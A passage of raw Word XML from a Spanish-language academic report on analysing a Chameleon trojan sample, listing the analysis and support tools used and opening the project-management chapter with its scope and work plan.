        </w:rPr>
        <w:pict w14:anchorId="4A7DC5A0">
          <v:shape id="_x0000_s2077" type="#_x0000_t75" alt="A blue fin with white text&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:172.3pt;margin-top:37.8pt;width:58.2pt;height:58.2pt;z-index:17;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35" o:title="A blue fin with white text&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16841173" w14:textId="09362008" w:rsidR="00D433B2" w:rsidRPr="00F70D8A" w:rsidRDefault="00B1279D" w:rsidP="00D433B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Wireshark: herramienta de análisis de tráfico de red más popular. Se trata de un programa de código abierto que permite la captura de paquetes de red y su posterior disección y análisis. En este caso servirá para tener una visión global del tráfico entre el dispositivo infectado y el servidor de comando y control remoto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F7D71D" w14:textId="5C51BBA9" w:rsidR="006843C6" w:rsidRPr="000E02BD" w:rsidRDefault="000C1FC5" w:rsidP="00D433B2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4552AFC7">
          <v:shape id="Picture 9" o:spid="_x0000_s2076" type="#_x0000_t75" alt="A white object with a black background&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:172.3pt;margin-top:29.35pt;width:65.1pt;height:65.1pt;z-index:11;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6" o:title="A white object with a black background&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="019521C4" w14:textId="520840A0" w:rsidR="002E2F55" w:rsidRPr="006843C6" w:rsidRDefault="002E2F55" w:rsidP="00F27B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006843C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DB Browser</w:t>
      </w:r>
      <w:r w:rsidR="00D433B2" w:rsidRPr="006843C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006843C6" w:rsidRPr="006843C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E386F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>programa</w:t>
      </w:r>
      <w:r w:rsidR="006843C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de código abierto</w:t>
      </w:r>
      <w:r w:rsidR="006843C6" w:rsidRPr="006843C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E386F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con la función de navegador </w:t>
      </w:r>
      <w:r w:rsidR="006843C6" w:rsidRPr="006843C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de bases de </w:t>
      </w:r>
      <w:r w:rsidR="006843C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>datos de SQLite</w:t>
      </w:r>
      <w:r w:rsidR="00803EB2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006843C6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se utiliza para observar el esquema de la base de datos creada por el malware, así como la información que se almacena en ella.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64979F78" w14:textId="52ECF10A" w:rsidR="00F706AA" w:rsidRPr="006843C6" w:rsidRDefault="00F706AA" w:rsidP="00F27B8D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155ACC21" w14:textId="206972CB" w:rsidR="00F706AA" w:rsidRDefault="00BE7406" w:rsidP="00F27B8D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por último, se presentan h</w:t>
      </w:r>
      <w:r w:rsidR="00F706AA" w:rsidRPr="00F706AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>erramientas adicionales utilizadas durante el pr</w:t>
      </w:r>
      <w:r w:rsidR="00F706AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>oyecto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sin pertenecer a ninguna de las fases en particular, si no que han sido empleadas para tareas diversas durante todas las fases</w:t>
      </w:r>
      <w:r w:rsidR="00F706AA">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58194653" w14:textId="23E7C8F4" w:rsidR="00C930D7" w:rsidRDefault="000C1FC5" w:rsidP="00F706AA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="53E76A7C">
          <v:shape id="Picture 10" o:spid="_x0000_s2075" type="#_x0000_t75" alt="A cartoon of a beer mug&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:155.45pt;margin-top:20.65pt;width:88.05pt;height:88.05pt;z-index:12;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37" o:title="A cartoon of a beer mug&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B8462F" w14:textId="2529F6A9" w:rsidR="00C930D7" w:rsidRDefault="00C930D7" w:rsidP="00F706AA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A3C77BC" w14:textId="0263A93A" w:rsidR="00F706AA" w:rsidRDefault="000C1FC5" w:rsidP="00F27B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="006F4A9E">
          <v:shape id="Graphic 11" o:spid="_x0000_s2074" type="#_x0000_t75" alt="" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:82.5pt;width:94.7pt;height:71.2pt;z-index:13;visibility:visibl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8" o:title=""/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00C930D7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Homebrew</w:t>
      </w:r>
      <w:r w:rsidR="00A87F4B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: gestor de paquetes utilizado en el sistema Mac para la instalación de programas y utilidades</w:t>
      </w:r>
      <w:r w:rsidR="00C930D7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> desde la línea de comandos, facilitando la gestión de dependencias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027EF8E0" w14:textId="47938BB6" w:rsidR="00371001" w:rsidRDefault="00371001" w:rsidP="00371001">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262E8A45" w14:textId="73F32F1A" w:rsidR="00F67E72" w:rsidRDefault="00F67E72" w:rsidP="00F27B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pip: gestor de paquetes y dependencias Python</w:t>
      </w:r>
      <w:r w:rsidR="00953D06">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que simplifica la instalación de utilidades como </w:t>
      </w:r>
      <w:r w:rsidR="00CD61DF">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">APKiD </w:t>
      </w:r>
      <w:r w:rsidR="009362B8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o FRIDA</w:t>
      </w:r>
      <w:r w:rsidR="007A3C22">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, evitando tener que lidiar con problemas de versiones o dependencias de forma manual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F033D5" w14:textId="002707CE" w:rsidR="009B74B1" w:rsidRDefault="000C1FC5" w:rsidP="009B74B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="702BAC93">
          <v:shape id="Picture 12" o:spid="_x0000_s2073" type="#_x0000_t75" alt="A crowbar on a piece of paper&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:38.9pt;width:86.55pt;height:86.55pt;z-index:14;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39" o:title="A crowbar on a piece of paper&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CA38C2" w14:textId="3374BEC2" w:rsidR="009B74B1" w:rsidRDefault="009B74B1" w:rsidP="009B74B1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBDA94B" w14:textId="0313D559" w:rsidR="00F706AA" w:rsidRDefault="00F706AA" w:rsidP="00B900AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">HexFiend: </w:t>
      </w:r>
      <w:r w:rsidR="009B74B1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>visualizador hexadecimal d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e archivos</w:t>
      </w:r>
      <w:r w:rsidR="009B74B1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> cuya utilización en el proyecto ha estado ligada a intentos de identificación de tipo de ficheros basados en su firma [X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9560BC" w14:textId="66C77F8A" w:rsidR="0067503B" w:rsidRDefault="000C1FC5" w:rsidP="0067503B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="2D11AE0B">
          <v:shape id="Picture 13" o:spid="_x0000_s2072" type="#_x0000_t75" alt="A blue square with white letter on it&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;margin-left:0;margin-top:20.05pt;width:69.7pt;height:64.7pt;z-index:15;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0" o:title="A blue square with white letter on it&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="510B89A3" w14:textId="425DF538" w:rsidR="0067503B" w:rsidRDefault="0067503B" w:rsidP="0067503B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="762CBE11" w14:textId="29954F38" w:rsidR="00315B8E" w:rsidRDefault="000C1FC5" w:rsidP="00B900AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:pict w14:anchorId="54E1611C">
          <v:shape id="Picture 8" o:spid="_x0000_s2071" type="#_x0000_t75" alt="A green square with a white x on it&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:170.05pt;margin-top:59.3pt;width:92.95pt;height:86.45pt;z-index:16;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1" o:title="A green square with a white x on it&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00315B8E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Word: </w:t>
      </w:r>
      <w:r w:rsidR="0067503B">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">procesador de texto utilizado en </w:t>
      </w:r>
      <w:r w:rsidR="00315B8E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>realización de la memoria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAFE5F0" w14:textId="53D92BFB" w:rsidR="00036D1E" w:rsidRDefault="00036D1E" w:rsidP="00036D1E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C083C25" w14:textId="37F2AF58" w:rsidR="00EE34BD" w:rsidRPr="00EE34BD" w:rsidRDefault="00EB2112" w:rsidP="00EE34BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2112">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Excel: </w:t>
      </w:r>
      <w:r w:rsidR="00036D1E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>procesador de hojas de cálculo</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2112">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizad</w:t>
      </w:r>
      <w:r w:rsidR="00036D1E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2112">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para la generación de los diagramas Gantt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de la planificación de tareas.</w:t>
      </w:r>
      <w:bookmarkStart w:id="26" w:name="_Toc107862684"/>
    </w:p>
    <w:p w14:paraId="564CA748" w14:textId="39D8DB56" w:rsidR="00E95A92" w:rsidRDefault="00EE34BD" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="27" w:name="_Toc170500153"/>
      <w:r w:rsidR="00E95A92">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Capítulo 2: Gestión del proyecto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="55BA5E5B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C2A3CB" w14:textId="389EBD01" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00222073">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve">En este apartado se especifica cómo se ha realizado la gestión del proyecto, incluyendo la planificación temporal del mismo, los presupuestos de su realización, la gestión de riesgos existentes, así como </w:t>
      </w:r>
      <w:r w:rsidR="008B216D">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve">la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>legislación aplicable correspondiente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B12A1AC" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D1382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28" w:name="_Toc107862685"/>
      <w:bookmarkStart w:id="29" w:name="_Toc170500154"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.1   ALCANCE DEL PROYECTO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="12CF0586" w14:textId="77777777" w:rsidR="00B31155" w:rsidRPr="00B31155" w:rsidRDefault="00B31155" w:rsidP="00B31155">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2963DC9A" w14:textId="659ACDBE" w:rsidR="00E95A92" w:rsidRDefault="00B31155" w:rsidP="00222073">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>El proyecto trata de obtener la mayor cantidad de información posible de la muestra de troyano seleccionada a través de las tareas de análisis</w:t>
      </w:r>
      <w:r w:rsidR="005A6DA1">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se </w:t>
      </w:r>
      <w:r w:rsidR="00AD66A6">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>enumerarán</w:t>
      </w:r>
      <w:r w:rsidR="005A6DA1">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> a continuación</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>. Esta información se podría posteriormente aplicar para la prevención de infecciones y la ayuda a la defensa de malware, en concreto el perteneciente a la familia Chameleon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7712CEC4" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="279338B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30" w:name="_2.2__"/>
      <w:bookmarkStart w:id="31" w:name="_Toc107862686"/>
      <w:bookmarkStart w:id="32" w:name="_Toc170500155"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.2   PLAN DE TRABAJO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="55F322D6" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8C5696" w14:textId="037404AD" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00222073">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para llevar a cabo la planificación de este proyecto se han estimado una serie de tareas a realizar y una duración aproximada del tiempo que se podría tardar en ejecutarlas. Más adelante</w:t>
      </w:r>
      <w:r w:rsidR="00E25AE6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en el </w:t>
      </w:r>
      <w:hyperlink w:anchor="_B.1__">
        <w:r>
          <w:rPr>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>Anexo B</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E25AE6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se mostrará la duración real que han tenido finalmente dichas tareas. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E2B973" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F1151D"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3" w:name="_Toc107862687"/>
      <w:bookmarkStart w:id="34" w:name="_Toc170500156"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2.2.1   Identificación de tareas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="48C3FD69" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21DD89ED" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="0021050D">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Las tareas principales que se han definido para conseguir llegar a la solución propuesta son las siguientes:</w:t>
      </w:r>
    </w:p>
